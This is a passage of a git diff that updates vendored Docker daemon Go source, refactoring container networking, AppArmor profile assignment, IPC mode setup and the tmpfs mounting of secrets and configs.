'%s'", p.Name) + } + + if !hostConfig.Isolation.IsValid() { + return nil, errors.Errorf("invalid isolation '%s' on %s", hostConfig.Isolation, runtime.GOOS) } + var ( + err error + warnings []string + ) // Now do platform-specific 
verification - return verifyPlatformContainerSettings(daemon, hostConfig, config, update) + if warnings, err = verifyPlatformContainerSettings(daemon, hostConfig, config, update); err != nil { + return warnings, err + } + if hostConfig.NetworkMode.IsHost() && len(hostConfig.PortBindings) > 0 { + warnings = append(warnings, "Published ports are discarded when using host network mode") + } + return warnings, err } diff --git a/vendor/github.com/docker/docker/daemon/container_linux.go b/vendor/github.com/docker/docker/daemon/container_linux.go new file mode 100644 index 0000000000..e6f5bf2ccc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_linux.go @@ -0,0 +1,30 @@ +//+build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" +) + +func (daemon *Daemon) saveApparmorConfig(container *container.Container) error { + container.AppArmorProfile = "" //we don't care about the previous value. + + if !daemon.apparmorEnabled { + return nil // if apparmor is disabled there is nothing to do here. 
+ } + + if err := parseSecurityOpt(container, container.HostConfig); err != nil { + return errdefs.InvalidParameter(err) + } + + if !container.HostConfig.Privileged { + if container.AppArmorProfile == "" { + container.AppArmorProfile = defaultApparmorProfile + } + + } else { + container.AppArmorProfile = "unconfined" + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations.go b/vendor/github.com/docker/docker/daemon/container_operations.go index c30250622d..df84f88f3f 100644 --- a/vendor/github.com/docker/docker/daemon/container_operations.go +++ b/vendor/github.com/docker/docker/daemon/container_operations.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "errors" @@ -10,34 +10,47 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" - derr "github.com/docker/docker/api/errors" containertypes "github.com/docker/docker/api/types/container" networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/container" "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/opts" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/runconfig" "github.com/docker/go-connections/nat" "github.com/docker/libnetwork" + netconst "github.com/docker/libnetwork/datastore" "github.com/docker/libnetwork/netlabel" "github.com/docker/libnetwork/options" "github.com/docker/libnetwork/types" + "github.com/sirupsen/logrus" ) var ( // ErrRootFSReadOnly is returned when a container // rootfs is marked readonly. 
ErrRootFSReadOnly = errors.New("container rootfs is marked read-only") - getPortMapInfo = container.GetSandboxPortMapInfo + getPortMapInfo = getSandboxPortMapInfo ) +func (daemon *Daemon) getDNSSearchSettings(container *container.Container) []string { + if len(container.HostConfig.DNSSearch) > 0 { + return container.HostConfig.DNSSearch + } + + if len(daemon.configStore.DNSSearch) > 0 { + return daemon.configStore.DNSSearch + } + + return nil +} + func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]libnetwork.SandboxOption, error) { var ( sboxOptions []libnetwork.SandboxOption err error dns []string - dnsSearch []string dnsOptions []string bindings = make(nat.PortMap) pbList []types.PortBinding @@ -78,11 +91,7 @@ func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]lib sboxOptions = append(sboxOptions, libnetwork.OptionDNS(d)) } - if len(container.HostConfig.DNSSearch) > 0 { - dnsSearch = container.HostConfig.DNSSearch - } else if len(daemon.configStore.DNSSearch) > 0 { - dnsSearch = daemon.configStore.DNSSearch - } + dnsSearch := daemon.getDNSSearchSettings(container) for _, ds := range dnsSearch { sboxOptions = append(sboxOptions, libnetwork.OptionDNSSearch(ds)) @@ -111,6 +120,9 @@ func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]lib for _, extraHost := range container.HostConfig.ExtraHosts { // allow IPv6 addresses in extra hosts; only split on first ":" + if _, err := opts.ValidateExtraHost(extraHost); err != nil { + return nil, err + } parts := strings.SplitN(extraHost, ":", 2) sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(parts[0], parts[1])) } @@ -241,13 +253,20 @@ func (daemon *Daemon) updateNetworkSettings(container *container.Container, n li return runconfig.ErrConflictHostNetwork } - for s := range container.NetworkSettings.Networks { - sn, err := daemon.FindNetwork(s) + for s, v := range container.NetworkSettings.Networks { + sn, err := 
daemon.FindNetwork(getNetworkID(s, v.EndpointSettings)) if err != nil { continue } if sn.Name() == n.Name() { + // If the network scope is swarm, then this + // is an attachable network, which may not + // be locally available previously. + // So always update. + if n.Info().Scope() == netconst.SwarmScope { + continue + } // Avoid duplicate config return nil } @@ -261,22 +280,20 @@ func (daemon *Daemon) updateNetworkSettings(container *container.Container, n li } } - if _, ok := container.NetworkSettings.Networks[n.Name()]; !ok { - container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{ - EndpointSettings: endpointConfig, - } + container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{ + EndpointSettings: endpointConfig, } return nil } func (daemon *Daemon) updateEndpointNetworkSettings(container *container.Container, n libnetwork.Network, ep libnetwork.Endpoint) error { - if err := container.BuildEndpointInfo(n, ep); err != nil { + if err := buildEndpointInfo(container.NetworkSettings, n, ep); err != nil { return err } if container.HostConfig.NetworkMode == runconfig.DefaultDaemonNetworkMode() { - container.NetworkSettings.Bridge = daemon.configStore.bridgeConfig.Iface + container.NetworkSettings.Bridge = daemon.configStore.BridgeConfig.Iface } return nil @@ -298,8 +315,8 @@ func (daemon *Daemon) updateNetwork(container *container.Container) error { // Find if container is connected to the default bridge network var n libnetwork.Network - for name := range container.NetworkSettings.Networks { - sn, err := daemon.FindNetwork(name) + for name, v := range container.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(getNetworkID(name, v.EndpointSettings)) if err != nil { continue } @@ -329,7 +346,9 @@ func (daemon *Daemon) updateNetwork(container *container.Container) error { } func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrName string, epConfig *networktypes.EndpointSettings) 
(libnetwork.Network, *networktypes.NetworkingConfig, error) { - n, err := daemon.FindNetwork(idOrName) + id := getNetworkID(idOrName, epConfig) + + n, err := daemon.FindNetwork(id) if err != nil { // We should always be able to find the network for a // managed container. @@ -362,27 +381,32 @@ func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrN retryCount int ) + if n == nil && daemon.attachableNetworkLock != nil { + daemon.attachableNetworkLock.Lock(id) + defer daemon.attachableNetworkLock.Unlock(id) + } + for { // In all other cases, attempt to attach to the network to // trigger attachment in the swarm cluster manager. if daemon.clusterProvider != nil { var err error - config, err = daemon.clusterProvider.AttachNetwork(idOrName, container.ID, addresses) + config, err = daemon.clusterProvider.AttachNetwork(id, container.ID, addresses) if err != nil { return nil, nil, err } } - n, err = daemon.FindNetwork(idOrName) + n, err = daemon.FindNetwork(id) if err != nil { if daemon.clusterProvider != nil { - if err := daemon.clusterProvider.DetachNetwork(idOrName, container.ID); err != nil { + if err := daemon.clusterProvider.DetachNetwork(id, container.ID); err != nil { logrus.Warnf("Could not rollback attachment for container %s to network %s: %v", container.ID, idOrName, err) } } // Retry network attach again if we failed to - // find the network after successfull + // find the network after successful // attachment because the only reason that // would happen is if some other container // attached to the swarm scope network went down @@ -410,7 +434,7 @@ func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrN return n, config, nil } -// updateContainerNetworkSettings update the network settings +// updateContainerNetworkSettings updates the network settings func (daemon *Daemon) updateContainerNetworkSettings(container *container.Container, endpointsConfig map[string]*networktypes.EndpointSettings) { var n 
libnetwork.Network @@ -495,12 +519,13 @@ func (daemon *Daemon) allocateNetwork(container *container.Container) error { logrus.Errorf("failed to cleanup up stale network sandbox for container %s", container.ID) } + if container.Config.NetworkDisabled || container.HostConfig.NetworkMode.IsContainer() { + return nil + } + updateSettings := false - if len(container.NetworkSettings.Networks) == 0 { - if container.Config.NetworkDisabled || container.HostConfig.NetworkMode.IsContainer() { - return nil - } + if len(container.NetworkSettings.Networks) == 0 { daemon.updateContainerNetworkSettings(container, nil) updateSettings = true } @@ -535,7 +560,29 @@ func (daemon *Daemon) allocateNetwork(container *container.Container) error { } } - if err := container.WriteHostConfig(); err != nil { + // If the container is not to be connected to any network, + // create its network sandbox now if not present + if len(networks) == 0 { + if nil == daemon.getNetworkSandbox(container) { + options, err := daemon.buildSandboxOptions(container) + if err != nil { + return err + } + sb, err := daemon.netController.NewSandbox(container.ID, options...) 
+ if err != nil { + return err + } + updateSandboxNetworkSettings(container, sb) + defer func() { + if err != nil { + sb.Delete() + } + }() + } + + } + + if _, err := container.WriteHostConfig(); err != nil { return err } networkActions.WithValues("allocate").UpdateSince(start) @@ -693,7 +740,7 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName controller := daemon.netController sb := daemon.getNetworkSandbox(container) - createOptions, err := container.BuildCreateEndpointOptions(n, endpointConfig, sb, daemon.configStore.DNS) + createOptions, err := buildCreateEndpointOptions(container, n, endpointConfig, sb, daemon.configStore.DNS) if err != nil { return err } @@ -732,10 +779,10 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName return err } - container.UpdateSandboxNetworkSettings(sb) + updateSandboxNetworkSettings(container, sb) } - joinOptions, err := container.BuildJoinOptions(n) + joinOptions, err := buildJoinOptions(container.NetworkSettings, n) if err != nil { return err } @@ -751,7 +798,7 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName } } - if err := container.UpdateJoinInfo(n, ep); err != nil { + if err := updateJoinInfo(container.NetworkSettings, n, ep); err != nil { return fmt.Errorf("Updating join info failed: %v", err) } @@ -762,6 +809,37 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName return nil } +func updateJoinInfo(networkSettings *network.Settings, n libnetwork.Network, ep libnetwork.Endpoint) error { // nolint: interfacer + if ep == nil { + return errors.New("invalid enppoint whhile building portmap info") + } + + if networkSettings == nil { + return errors.New("invalid network settings while building port map info") + } + + if len(networkSettings.Ports) == 0 { + pm, err := getEndpointPortMapInfo(ep) + if err != nil { + return err + } + networkSettings.Ports = pm + } + + epInfo := ep.Info() + if epInfo == nil { + 
// It is not an error to get an empty endpoint info + return nil + } + if epInfo.Gateway() != nil { + networkSettings.Networks[n.Name()].Gateway = epInfo.Gateway().String() + } + if epInfo.GatewayIPv6().To16() != nil { + networkSettings.Networks[n.Name()].IPv6Gateway = epInfo.GatewayIPv6().String() + } + return nil +} + // ForceEndpointDelete deletes an endpoint from a network forcefully func (daemon *Daemon) ForceEndpointDelete(name string, networkName string) error { n, err := daemon.FindNetwork(networkName) @@ -808,7 +886,7 @@ func (daemon *Daemon) disconnectFromNetwork(container *container.Container, n li } if ep == nil { - return fmt.Errorf("container %s is not connected to the network", container.ID) + return fmt.Errorf("container %s is not connected to network %s", container.ID, n.Name()) } if err := ep.Leave(sbox); err != nil { @@ -823,16 +901,24 @@ func (daemon *Daemon) disconnectFromNetwork(container *container.Container, n li delete(container.NetworkSettings.Networks, n.Name()) - if daemon.clusterProvider != nil && n.Info().Dynamic() && !container.Managed { - if err := daemon.clusterProvider.DetachNetwork(n.Name(), container.ID); err != nil { - logrus.Warnf("error detaching from network %s: %v", n.Name(), err) - if err := daemon.clusterProvider.DetachNetwork(n.ID(), container.ID); err != nil { - logrus.Warnf("error detaching from network %s: %v", n.ID(), err) + daemon.tryDetachContainerFromClusterNetwork(n, container) + + return nil +} + +func (daemon *Daemon) tryDetachContainerFromClusterNetwork(network libnetwork.Network, container *container.Container) { + if daemon.clusterProvider != nil && network.Info().Dynamic() && !container.Managed { + if err := daemon.clusterProvider.DetachNetwork(network.Name(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", network.Name(), err) + if err := daemon.clusterProvider.DetachNetwork(network.ID(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", 
network.ID(), err) } } } - - return nil + attributes := map[string]string{ + "container": container.ID, + } + daemon.LogNetworkEventWithAttributes(network, "disconnect", attributes) } func (daemon *Daemon) initializeNetworking(container *container.Container) error { @@ -844,7 +930,12 @@ func (daemon *Daemon) initializeNetworking(container *container.Container) error if err != nil { return err } - initializeNetworkingPaths(container, nc) + + err = daemon.initializeNetworkingPaths(container, nc) + if err != nil { + return err + } + container.Config.Hostname = nc.Config.Hostname container.Config.Domainname = nc.Config.Domainname return nil @@ -876,7 +967,7 @@ func (daemon *Daemon) getNetworkedContainer(containerID, connectedContainerID st } if !nc.IsRunning() { err := fmt.Errorf("cannot join network of a non running container: %s", connectedContainerID) - return nil, derr.NewRequestConflictError(err) + return nil, errdefs.Conflict(err) } if nc.IsRestarting() { return nil, errContainerIsRestarting(connectedContainerID) @@ -897,13 +988,13 @@ func (daemon *Daemon) releaseNetwork(container *container.Container) { settings := container.NetworkSettings.Networks container.NetworkSettings.Ports = nil - if sid == "" || len(settings) == 0 { + if sid == "" { return } var networks []libnetwork.Network for n, epSettings := range settings { - if nw, err := daemon.FindNetwork(n); err == nil { + if nw, err := daemon.FindNetwork(getNetworkID(n, epSettings.EndpointSettings)); err == nil { networks = append(networks, nw) } @@ -925,19 +1016,7 @@ func (daemon *Daemon) releaseNetwork(container *container.Container) { } for _, nw := range networks { - if daemon.clusterProvider != nil && nw.Info().Dynamic() && !container.Managed { - if err := daemon.clusterProvider.DetachNetwork(nw.Name(), container.ID); err != nil { - logrus.Warnf("error detaching from network %s: %v", nw.Name(), err) - if err := daemon.clusterProvider.DetachNetwork(nw.ID(), container.ID); err != nil { - logrus.Warnf("error 
detaching from network %s: %v", nw.ID(), err) - } - } - } - - attributes := map[string]string{ - "container": container.ID, - } - daemon.LogNetworkEventWithAttributes(nw, "disconnect", attributes) + daemon.tryDetachContainerFromClusterNetwork(nw, container) } networkActions.WithValues("release").UpdateSince(start) } @@ -951,6 +1030,9 @@ func (daemon *Daemon) ConnectToNetwork(container *container.Container, idOrName if endpointConfig == nil { endpointConfig = &networktypes.EndpointSettings{} } + container.Lock() + defer container.Unlock() + if !container.Running { if container.RemovalInProgress || container.Dead { return errRemovalContainer(container.ID) @@ -973,15 +1055,16 @@ func (daemon *Daemon) ConnectToNetwork(container *container.Container, idOrName return err } } - if err := container.ToDiskLocking(); err != nil { - return fmt.Errorf("Error saving container to disk: %v", err) - } - return nil + + return container.CheckpointTo(daemon.containersReplica) } // DisconnectFromNetwork disconnects container from network n. 
func (daemon *Daemon) DisconnectFromNetwork(container *container.Container, networkName string, force bool) error { n, err := daemon.FindNetwork(networkName) + container.Lock() + defer container.Unlock() + if !container.Running || (err != nil && force) { if container.RemovalInProgress || container.Dead { return errRemovalContainer(container.ID) @@ -1009,16 +1092,16 @@ func (daemon *Daemon) DisconnectFromNetwork(container *container.Container, netw return err } - if err := container.ToDiskLocking(); err != nil { - return fmt.Errorf("Error saving container to disk: %v", err) + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + return err } if n != nil { - attributes := map[string]string{ + daemon.LogNetworkEventWithAttributes(n, "disconnect", map[string]string{ "container": container.ID, - } - daemon.LogNetworkEventWithAttributes(n, "disconnect", attributes) + }) } + return nil } @@ -1035,7 +1118,7 @@ func (daemon *Daemon) ActivateContainerServiceBinding(containerName string) erro return sb.EnableService() } -// DeactivateContainerServiceBinding remove this container fromload balancer active rotation, and DNS response +// DeactivateContainerServiceBinding removes this container from load balancer active rotation, and DNS response func (daemon *Daemon) DeactivateContainerServiceBinding(containerName string) error { container, err := daemon.GetContainer(containerName) if err != nil { @@ -1043,7 +1126,25 @@ func (daemon *Daemon) DeactivateContainerServiceBinding(containerName string) er } sb := daemon.getNetworkSandbox(container) if sb == nil { - return fmt.Errorf("network sandbox does not exist for container %s", containerName) + // If the network sandbox is not found, then there is nothing to deactivate + logrus.Debugf("Could not find network sandbox for container %s on service binding deactivation request", containerName) + return nil } return sb.DisableService() } + +func getNetworkID(name string, endpointSettings 
*networktypes.EndpointSettings) string { + // We only want to prefer NetworkID for user defined networks. + // For systems like bridge, none, etc. the name is preferred (otherwise restart may cause issues) + if containertypes.NetworkMode(name).IsUserDefined() && endpointSettings != nil && endpointSettings.NetworkID != "" { + return endpointSettings.NetworkID + } + return name +} + +// updateSandboxNetworkSettings updates the sandbox ID and Key. +func updateSandboxNetworkSettings(c *container.Container, sb libnetwork.Sandbox) error { + c.NetworkSettings.SandboxID = sb.ID() + c.NetworkSettings.SandboxKey = sb.Key() + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_solaris.go b/vendor/github.com/docker/docker/daemon/container_operations_solaris.go deleted file mode 100644 index 1653948de1..0000000000 --- a/vendor/github.com/docker/docker/daemon/container_operations_solaris.go +++ /dev/null @@ -1,46 +0,0 @@ -// +build solaris - -package daemon - -import ( - "github.com/docker/docker/container" - "github.com/docker/docker/runconfig" - "github.com/docker/libnetwork" -) - -func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { - return nil, nil -} - -func (daemon *Daemon) setupIpcDirs(container *container.Container) error { - return nil -} - -func killProcessDirectly(container *container.Container) error { - return nil -} - -func detachMounted(path string) error { - return nil -} - -func isLinkable(child *container.Container) bool { - // A container is linkable only if it belongs to the default network - _, ok := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] - return ok -} - -func enableIPOnPredefinedNetwork() bool { - return false -} - -func (daemon *Daemon) isNetworkHotPluggable() bool { - return false -} - -func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error { - return nil -} - -func 
initializeNetworkingPaths(container *container.Container, nc *container.Container) { -} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_unix.go b/vendor/github.com/docker/docker/daemon/container_operations_unix.go index 2296045765..bc7ee45233 100644 --- a/vendor/github.com/docker/docker/daemon/container_operations_unix.go +++ b/vendor/github.com/docker/docker/daemon/container_operations_unix.go @@ -1,27 +1,28 @@ // +build linux freebsd -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "io/ioutil" "os" "path/filepath" "strconv" - "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/cloudflare/cfssl/log" "github.com/docker/docker/container" "github.com/docker/docker/daemon/links" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/runconfig" "github.com/docker/libnetwork" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/opencontainers/selinux/go-selinux/label" "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { @@ -57,133 +58,143 @@ func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]s return env, nil } -func (daemon *Daemon) getIpcContainer(container *container.Container) (*container.Container, error) { - containerID := container.HostConfig.IpcMode.Container() - c, err := daemon.GetContainer(containerID) +func (daemon *Daemon) getIpcContainer(id string) (*container.Container, error) { + errMsg := "can't join IPC of container " + id + // Check the container exists + container, err := daemon.GetContainer(id) if err != nil { - return nil, err + return nil, errors.Wrap(err, errMsg) } - if !c.IsRunning() { - return nil, fmt.Errorf("cannot join IPC of a non running container: %s", 
containerID) + // Check the container is running and not restarting + if err := daemon.checkContainer(container, containerIsRunning, containerIsNotRestarting); err != nil { + return nil, errors.Wrap(err, errMsg) } - if c.IsRestarting() { - return nil, errContainerIsRestarting(container.ID) + // Check the container ipc is shareable + if st, err := os.Stat(container.ShmPath); err != nil || !st.IsDir() { + if err == nil || os.IsNotExist(err) { + return nil, errors.New(errMsg + ": non-shareable IPC") + } + // stat() failed? + return nil, errors.Wrap(err, errMsg+": unexpected error from stat "+container.ShmPath) } - return c, nil + + return container, nil } func (daemon *Daemon) getPidContainer(container *container.Container) (*container.Container, error) { containerID := container.HostConfig.PidMode.Container() - c, err := daemon.GetContainer(containerID) + container, err := daemon.GetContainer(containerID) if err != nil { - return nil, err + return nil, errors.Wrapf(err, "cannot join PID of a non running container: %s", containerID) } + return container, daemon.checkContainer(container, containerIsRunning, containerIsNotRestarting) +} + +func containerIsRunning(c *container.Container) error { if !c.IsRunning() { - return nil, fmt.Errorf("cannot join PID of a non running container: %s", containerID) + return errdefs.Conflict(errors.Errorf("container %s is not running", c.ID)) } + return nil +} + +func containerIsNotRestarting(c *container.Container) error { if c.IsRestarting() { - return nil, errContainerIsRestarting(container.ID) + return errContainerIsRestarting(c.ID) } - return c, nil + return nil } func (daemon *Daemon) setupIpcDirs(c *container.Container) error { - var err error - - c.ShmPath, err = c.ShmResourcePath() - if err != nil { - return err - } + ipcMode := c.HostConfig.IpcMode - if c.HostConfig.IpcMode.IsContainer() { - ic, err := daemon.getIpcContainer(c) + switch { + case ipcMode.IsContainer(): + ic, err := daemon.getIpcContainer(ipcMode.Container()) 
if err != nil { return err } c.ShmPath = ic.ShmPath - } else if c.HostConfig.IpcMode.IsHost() { + + case ipcMode.IsHost(): if _, err := os.Stat("/dev/shm"); err != nil { return fmt.Errorf("/dev/shm is not mounted, but must be for --ipc=host") } c.ShmPath = "/dev/shm" - } else { - rootUID, rootGID := daemon.GetRemappedUIDGID() + + case ipcMode.IsPrivate(), ipcMode.IsNone(): + // c.ShmPath will/should not be used, so make it empty. + // Container's /dev/shm mount comes from OCI spec. + c.ShmPath = "" + + case ipcMode.IsEmpty(): + // A container was created by an older version of the daemon. + // The default behavior used to be what is now called "shareable". + fallthrough + + case ipcMode.IsShareable(): + rootIDs := daemon.idMappings.RootPair() if !c.HasMountFor("/dev/shm") { shmPath, err := c.ShmResourcePath() if err != nil { return err } - if err := idtools.MkdirAllAs(shmPath, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(shmPath, 0700, rootIDs); err != nil { return err } - shmSize := container.DefaultSHMSize - if c.HostConfig.ShmSize != 0 { - shmSize = c.HostConfig.ShmSize - } - shmproperty := "mode=1777,size=" + strconv.FormatInt(shmSize, 10) - if err := syscall.Mount("shm", shmPath, "tmpfs", uintptr(syscall.MS_NOEXEC|syscall.MS_NOSUID|syscall.MS_NODEV), label.FormatMountLabel(shmproperty, c.GetMountLabel())); err != nil { + shmproperty := "mode=1777,size=" + strconv.FormatInt(c.HostConfig.ShmSize, 10) + if err := unix.Mount("shm", shmPath, "tmpfs", uintptr(unix.MS_NOEXEC|unix.MS_NOSUID|unix.MS_NODEV), label.FormatMountLabel(shmproperty, c.GetMountLabel())); err != nil { return fmt.Errorf("mounting shm tmpfs: %s", err) } - if err := os.Chown(shmPath, rootUID, rootGID); err != nil { + if err := os.Chown(shmPath, rootIDs.UID, rootIDs.GID); err != nil { return err } + c.ShmPath = shmPath } + default: + return fmt.Errorf("invalid IPC mode: %v", ipcMode) } return nil } func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr 
error) { - if len(c.SecretReferences) == 0 { + if len(c.SecretReferences) == 0 && len(c.ConfigReferences) == 0 { return nil } - localMountPath := c.SecretMountPath() - logrus.Debugf("secrets: setting up secret dir: %s", localMountPath) - + if err := daemon.createSecretsDir(c); err != nil { + return err + } defer func() { if setupErr != nil { - // cleanup - _ = detachMounted(localMountPath) - - if err := os.RemoveAll(localMountPath); err != nil { - log.Errorf("error cleaning up secret mount: %s", err) - } + daemon.cleanupSecretDir(c) } }() - // retrieve possible remapped range start for root UID, GID - rootUID, rootGID := daemon.GetRemappedUIDGID() - // create tmpfs - if err := idtools.MkdirAllAs(localMountPath, 0700, rootUID, rootGID); err != nil { - return errors.Wrap(err, "error creating secret local mount path") - } - tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootUID, rootGID) - if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "nodev,nosuid,noexec,"+tmpfsOwnership); err != nil { - return errors.Wrap(err, "unable to setup secret mount") + if c.DependencyStore == nil { + return fmt.Errorf("secret store is not initialized") } - for _, s := range c.SecretReferences { - if c.SecretStore == nil { - return fmt.Errorf("secret store is not initialized") - } + // retrieve possible remapped range start for root UID, GID + rootIDs := daemon.idMappings.RootPair() + for _, s := range c.SecretReferences { // TODO (ehazlett): use type switch when more are supported if s.File == nil { - return fmt.Errorf("secret target type is not a file target") + logrus.Error("secret target type is not a file target") + continue } - targetPath := filepath.Clean(s.File.Name) - // ensure that the target is a filename only; no paths allowed - if targetPath != filepath.Base(targetPath) { - return fmt.Errorf("error creating secret: secret must not be a path") + // secrets are created in the SecretMountPath on the host, at a + // single level + fPath, err := c.SecretFilePath(*s) + if err 
!= nil { + return errors.Wrap(err, "error getting secret file path") } - - fPath := filepath.Join(localMountPath, targetPath) - if err := idtools.MkdirAllAs(filepath.Dir(fPath), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(filepath.Dir(fPath), 0700, rootIDs); err != nil { return errors.Wrap(err, "error creating secret mount path") } @@ -191,9 +202,9 @@ func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) { "name": s.File.Name, "path": fPath, }).Debug("injecting secret") - secret := c.SecretStore.Get(s.SecretID) - if secret == nil { - return fmt.Errorf("unable to get secret from secret store") + secret, err := c.DependencyStore.Secrets().Get(s.SecretID) + if err != nil { + return errors.Wrap(err, "unable to get secret from secret store") } if err := ioutil.WriteFile(fPath, secret.Spec.Data, s.File.Mode); err != nil { return errors.Wrap(err, "error injecting secret") @@ -208,26 +219,127 @@ func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) { return err } - if err := os.Chown(fPath, rootUID+uid, rootGID+gid); err != nil { + if err := os.Chown(fPath, rootIDs.UID+uid, rootIDs.GID+gid); err != nil { return errors.Wrap(err, "error setting ownership for secret") } + if err := os.Chmod(fPath, s.File.Mode); err != nil { + return errors.Wrap(err, "error setting file mode for secret") + } + } + + for _, ref := range c.ConfigReferences { + // TODO (ehazlett): use type switch when more are supported + if ref.File == nil { + logrus.Error("config target type is not a file target") + continue + } + + fPath, err := c.ConfigFilePath(*ref) + if err != nil { + return errors.Wrap(err, "error getting config file path for container") + } + if err := idtools.MkdirAllAndChown(filepath.Dir(fPath), 0700, rootIDs); err != nil { + return errors.Wrap(err, "error creating config mount path") + } + + logrus.WithFields(logrus.Fields{ + "name": ref.File.Name, + "path": fPath, + }).Debug("injecting config") + config, 
err := c.DependencyStore.Configs().Get(ref.ConfigID) + if err != nil { + return errors.Wrap(err, "unable to get config from config store") + } + if err := ioutil.WriteFile(fPath, config.Spec.Data, ref.File.Mode); err != nil { + return errors.Wrap(err, "error injecting config") + } + + uid, err := strconv.Atoi(ref.File.UID) + if err != nil { + return err + } + gid, err := strconv.Atoi(ref.File.GID) + if err != nil { + return err + } + + if err := os.Chown(fPath, rootIDs.UID+uid, rootIDs.GID+gid); err != nil { + return errors.Wrap(err, "error setting ownership for config") + } + if err := os.Chmod(fPath, ref.File.Mode); err != nil { + return errors.Wrap(err, "error setting file mode for config") + } + } + + return daemon.remountSecretDir(c) +} + +// createSecretsDir is used to create a dir suitable for storing container secrets. +// In practice this is using a tmpfs mount and is used for both "configs" and "secrets" +func (daemon *Daemon) createSecretsDir(c *container.Container) error { + // retrieve possible remapped range start for root UID, GID + rootIDs := daemon.idMappings.RootPair() + dir, err := c.SecretMountPath() + if err != nil { + return errors.Wrap(err, "error getting container secrets dir") } + // create tmpfs + if err := idtools.MkdirAllAndChown(dir, 0700, rootIDs); err != nil { + return errors.Wrap(err, "error creating secret local mount path") + } + + tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootIDs.UID, rootIDs.GID) + if err := mount.Mount("tmpfs", dir, "tmpfs", "nodev,nosuid,noexec,"+tmpfsOwnership); err != nil { + return errors.Wrap(err, "unable to setup secret mount") + } + return nil +} + +func (daemon *Daemon) remountSecretDir(c *container.Container) error { + dir, err := c.SecretMountPath() + if err != nil { + return errors.Wrap(err, "error getting container secrets path") + } + if err := label.Relabel(dir, c.MountLabel, false); err != nil { + logrus.WithError(err).WithField("dir", dir).Warn("Error while attempting to set selinux label") 
+ } + rootIDs := daemon.idMappings.RootPair() + tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootIDs.UID, rootIDs.GID) + // remount secrets ro - if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "remount,ro,"+tmpfsOwnership); err != nil { - return errors.Wrap(err, "unable to remount secret dir as readonly") + if err := mount.Mount("tmpfs", dir, "tmpfs", "remount,ro,"+tmpfsOwnership); err != nil { + return errors.Wrap(err, "unable to remount dir as readonly") } return nil } -func killProcessDirectly(container *container.Container) error { - if _, err := container.WaitStop(10 * time.Second); err != nil { +func (daemon *Daemon) cleanupSecretDir(c *container.Container) { + dir, err := c.SecretMountPath() + if err != nil { + logrus.WithError(err).WithField("container", c.ID).Warn("error getting secrets mount path for container") + } + if err := mount.RecursiveUnmount(dir); err != nil { + logrus.WithField("dir", dir).WithError(err).Warn("Error while attmepting to unmount dir, this may prevent removal of container.") + } + if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + logrus.WithField("dir", dir).WithError(err).Error("Error removing dir.") + } +} + +func killProcessDirectly(cntr *container.Container) error { + ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) + defer cancel() + + // Block until the container to stops or timeout. 
